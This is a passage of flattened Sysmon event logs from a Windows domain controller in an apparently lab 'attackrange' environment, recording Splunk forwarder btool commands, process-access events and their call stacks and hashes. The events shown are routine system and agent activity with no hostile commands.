Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.596{733EE690-3E0D-5F80-5700-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0D-5F80-5600-000000007F01}3956C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0D-5F80-5600-000000007F01}3956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0D-5F80-5600-000000007F01}3956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3E0D-5F80-5500-000000007F01}26642200C:\Windows\system32\cmd.exe{733EE690-3E0D-5F80-5600-000000007F01}3956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.591{733EE690-3E0D-5F80-5600-000000007F01}3956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0D-5F80-5500-000000007F01}2664C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0D-5F80-5500-000000007F01}2664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0D-5F80-5500-000000007F01}2664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.573{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0D-5F80-5500-000000007F01}2664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.586{733EE690-3E0D-5F80-5500-000000007F01}2664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0D-5F80-5400-000000007F01}3844C:\Program 